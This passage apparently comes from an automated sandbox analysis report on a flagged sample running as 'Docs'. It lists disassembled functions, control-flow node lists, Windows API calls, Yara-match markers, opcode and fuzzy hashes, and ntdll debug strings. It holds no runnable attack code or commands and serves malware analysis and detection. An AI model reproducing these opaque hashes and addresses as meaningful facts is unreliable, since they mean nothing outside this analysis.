                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d1bb6a1c62360998ff2eedc19a6f85f9b9c9e4172c0911ef26eb7fbe8610ff72
                                                              • Instruction ID: d569c51058d2ecf3e29643ff625d57e2e3441e78020c9d2aae99f8ab471d03e0
                                                              • Opcode Fuzzy Hash: d1bb6a1c62360998ff2eedc19a6f85f9b9c9e4172c0911ef26eb7fbe8610ff72
                                                              • Instruction Fuzzy Hash: 2C90026120240003450571584414616404AE7E1211B59C425E2414990DC665C9A56225
                                                              Function 015E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: efb4a6bc95a297836f6fdb6fabc0d37667fee6a7593bdab116ce7f6aa1d14ae7
                                                              • Instruction ID: ece4a825972cd39c39a6e94d1a7c764132b1db88d7506ed9f10b1d064ea22799
                                                              • Opcode Fuzzy Hash: efb4a6bc95a297836f6fdb6fabc0d37667fee6a7593bdab116ce7f6aa1d14ae7
                                                              • Instruction Fuzzy Hash: 2A90023120140413D511715845047070049E7D1251F99C816A1824958DD796CA66A221
                                                              Function 015E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2065394cf928cf7415f4b01ea8a3877ef8c8d20b93835d61c8f0268b9b81fd9d
                                                              • Instruction ID: 4148e3c0adba99ffc56f1c333c8b480ed35d19aec21455f542ce30763c25dd75
                                                              • Opcode Fuzzy Hash: 2065394cf928cf7415f4b01ea8a3877ef8c8d20b93835d61c8f0268b9b81fd9d
                                                              • Instruction Fuzzy Hash: 6990023120148802D5107158840474A0045E7D1311F5DC815A5824A58DC7D5C9A57221
                                                              Function 015E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fb79abdbd9e8c61ea391d7ecb107ccf0383d324d4f6be24883cb545f6f4bcb5e
                                                              • Instruction ID: e97fababe3f5696cfe48f370160cb99c6d255d5d0369453bd3315ef42bbd5ce5
                                                              • Opcode Fuzzy Hash: fb79abdbd9e8c61ea391d7ecb107ccf0383d324d4f6be24883cb545f6f4bcb5e
                                                              • Instruction Fuzzy Hash: BE90023160550402D500715845147061045E7D1211F69C815A1824968DC7D5CA6566A2
                                                              Function 00414320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                              • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5
                                                              Function 004143A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                              • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5
                                                              Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                              • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5
                                                              Function 00417BDE Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 337 417c68-417c70 335->337 337->339 340 417c72-417c74 337->340 339->335 341 417c3a-417c3b 339->341 340->337 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 348 417bda-417bdd 343->348 344->335 347 417c99-417cae 345->347 349 417cc0-417cc1 346->349 350 417c84 346->350 351 417cb0 347->351 352 417d17-417d2b call 42b9b3 347->352 350->347 353 417c87 350->353 354 417cb2-417cbe 351->354 355 417d2e-417d3f 351->355 352->355 353->345 354->349
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                              • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5
                                                              Function 00417BF8 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 362 417c72-417c74 360->362 363 417c2e-417c38 360->363 364 417be5-417bf3 361->364 365 417c2a 361->365 370 417c76-417c7a 362->370 371 417c68-417c6e 362->371 366 417c55-417c67 363->366 367 417c3a-417c3b 363->367 364->358 368 417bb8-417bc1 365->368 369 417c2c-417c38 365->369 366->371 372 417bca-417bd7 LdrLoadDll 367->372 373 417c3d 367->373 374 417bc3-417bc9 368->374 375 417bda-417bdd 368->375 369->366 369->367 376 417c8c-417c98 370->376 377 417c7c-417c82 370->377 371->360 372->375 373->366 374->372 378 417c99-417cae 376->378 379 417cc0-417cc1 377->379 380 417c84 377->380 381 417cb0 378->381 382 417d17-417d2b call 42b9b3 378->382 380->378 383 417c87 380->383 384 417cb2-417cbe 381->384 385 417d2e-417d3f 381->385 382->385 383->376 384->379
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                              • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8
                                                              Function 0042CC63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                              • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8
                                                              Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                              • Instruction ID: 17ffdd14cf893de34d185b730fd02e884b2db9c7d9af60b921a6e04f82d44752
                                                              • Opcode Fuzzy Hash: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                              • Instruction Fuzzy Hash: C8E06D712002047BC610EE49DC42F9B37ACEFC5714F004419F908A7341D674B9108AB8
                                                              Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                              • Instruction ID: db584931667c167d052b57122e12c945e868705e8a3680be29b3f7ccc7343bef
                                                              • Opcode Fuzzy Hash: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                              • Instruction Fuzzy Hash: 49E04F356442147BC610AA5ADC01F9B775CEBC5754F414419FA0CA7241D675791187E4
                                                              Function 015E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 424 15e2c0a-15e2c0f 425 15e2c1f-15e2c26 LdrInitializeThunk 424->425 426 15e2c11-15e2c18 424->426
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7b3ed69e72735e8526f9528bac7897cf54025084d5e17d934d9388216d66b734
                                                              • Instruction ID: 932965a108c9d8be306911566dc32ef95921709c4ffc900eafbba808685d1c03
                                                              • Opcode Fuzzy Hash: 7b3ed69e72735e8526f9528bac7897cf54025084d5e17d934d9388216d66b734
                                                              • Instruction Fuzzy Hash: 85B02B31C015C0C5DE01F360860C70B3940B7C0300F19C021D3030A41F4338C0E0E271

                                                              Non-executed Functions

                                                              Function 01622349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 77e68b103c96231b87f5e84bff1f8db5e2bf77184be205c06964e0695fa8045b
                                                              • Instruction ID: fe97975145bed24bee48efd9915bee2253ff62bc66cb00512301847b3a636a50
                                                              • Opcode Fuzzy Hash: 77e68b103c96231b87f5e84bff1f8db5e2bf77184be205c06964e0695fa8045b
                                                              • Instruction Fuzzy Hash: 3A929D71A08B529FE721DE28CC90B6BB7E8BB88750F04491DFA949B350D774E844CF92
                                                              Function 015D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • 8, xrefs: 016152E3
                                                              • Invalid debug info address of this critical section, xrefs: 016154B6
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154E2
                                                              • Address of the debug info found in the active list., xrefs: 016154AE, 016154FA
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0161540A, 01615496, 01615519
                                                              • Thread identifier, xrefs: 0161553A
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01615543
                                                              • Critical section address., xrefs: 01615502
                                                              • Critical section address, xrefs: 01615425, 016154BC, 01615534
                                                              • corrupted critical section, xrefs: 016154C2
                                                              • Critical section debug info address, xrefs: 0161541F, 0161552E
                                                              • undeleted critical section in freed memory, xrefs: 0161542B
                                                              • double initialized or corrupted critical section, xrefs: 01615508
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154CE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 6018b1d25151b7ad2655095ecce6a11baab3cc0a0c07e671c778807a3530f4fa
                                                              • Instruction ID: 985bedd9f52f0cc5a887934489c888c49bb6a41c086734a0f411b6d1cbcfd4ee
                                                              • Opcode Fuzzy Hash: 6018b1d25151b7ad2655095ecce6a11baab3cc0a0c07e671c778807a3530f4fa
                                                              • Instruction Fuzzy Hash: F181BBB1A40349AFDB20CF99CC45BAEBBB9FB89714F144119F505BB290D3B1A941CBA0
                                                              Function 015D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016122E4
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01612498
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016124C0
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01612412
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016125EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01612506
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01612624
                                                              • @, xrefs: 0161259B
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01612602
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0161261F
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01612409
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 1c2666d32e3e9e1db2c81e95812008e9dd5609ba8952fb054d279ed9ed715521
                                                              • Instruction ID: 47a9b01a5c3cca8b5d58c993b1bb899b1b5b1a0d90e990f0a9b3828cfabc820d
                                                              • Opcode Fuzzy Hash: 1c2666d32e3e9e1db2c81e95812008e9dd5609ba8952fb054d279ed9ed715521
                                                              • Instruction Fuzzy Hash: 370280B1D002299FDB31DB58CC80BDAB7B8BF54704F1445DAE609AB251EB709E84CF99
                                                              Function 01648B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: d153f2483a17a54487fd3f27d46ab0b460fa7290676298d6218de4b2db4b17f6
                                                              • Instruction ID: 56708fa1dc6bf703efdb967a54f14550c43050184bb61aaff49820cbf72f722c
                                                              • Opcode Fuzzy Hash: d153f2483a17a54487fd3f27d46ab0b460fa7290676298d6218de4b2db4b17f6
                                                              • Instruction Fuzzy Hash: 1551CE725053029BC729DF58EC49BABBBECFF98240F14492DE999CB241E770D604CB92
                                                              Function 01650274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 9c60ca51f4a1cf82f923e619a4b0838a40d9131111fdc2a918567021cc07b33c
                                                              • Instruction ID: b3b96be5dcf87c3223eb52e312e8296c5b30a593901a338dc67e237d6c1d6599
                                                              • Opcode Fuzzy Hash: 9c60ca51f4a1cf82f923e619a4b0838a40d9131111fdc2a918567021cc07b33c
                                                              • Instruction Fuzzy Hash: 9CD1DB35610686DFDB62DF68D841AAEBBF1FF8A714F088049F8459B362C734D981CB15
                                                              Function 016289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • VerifierFlags, xrefs: 01628C50
                                                              • VerifierDebug, xrefs: 01628CA5
                                                              • HandleTraces, xrefs: 01628C8F
                                                              • VerifierDlls, xrefs: 01628CBD
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01628A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01628B8F
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01628A3D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 9f4fdac2b4f0372d1213f8a4a9b6b55ec0ad5fb5d5eadec2fc8994d8f96b9e95
                                                              • Instruction ID: ab2dd7338ba6b28372543c29a27f83e49e304a4aeab05f28515caeb665b7bb7f
                                                              • Opcode Fuzzy Hash: 9f4fdac2b4f0372d1213f8a4a9b6b55ec0ad5fb5d5eadec2fc8994d8f96b9e95
                                                              • Instruction Fuzzy Hash: CC910472605B229FE722EF68CC80B6A77ECBB94B14F05489DFA416F240C7309815CF95
                                                              Function 015AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: 4f0a5bef1040519e11cf3df22c6114d3d3def4191cd5b3bebe7d03ae2452e536
                                                              • Instruction ID: 46a51fc584e855eae9411eab9a4e6a3d461bf2a2f32b04e367fe42104f6eb9f3
                                                              • Opcode Fuzzy Hash: 4f0a5bef1040519e11cf3df22c6114d3d3def4191cd5b3bebe7d03ae2452e536
                                                              • Instruction Fuzzy Hash: 9FA22970A4562A8BDB79DF18CC987AEBBB5FF45304F5442DAD509AB290DB309E81CF40
                                                              Function 015D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 524dfcf87bf074b174e50864e49145b4f68e57fe59ac6ce5bed6f62fb0717502
                                                              • Instruction ID: e44b393a8f4105faa941c4cb510c3e65def4b5e68a39e4dd042da2a949d0415b
                                                              • Opcode Fuzzy Hash: 524dfcf87bf074b174e50864e49145b4f68e57fe59ac6ce5bed6f62fb0717502
                                                              • Instruction Fuzzy Hash: 47913871A003169BEB35DF6DDC85BAE3BA5BF40B24F18412DD9016F389DB709842CB94
                                                              Function 0159645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015F9A2A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015F99ED
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015F9A01
                                                              • LdrpInitShimEngine, xrefs: 015F99F4, 015F9A07, 015F9A30
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015F9A11, 015F9A3A
                                                              • apphelp.dll, xrefs: 01596496
                                                              Memory Dump Source
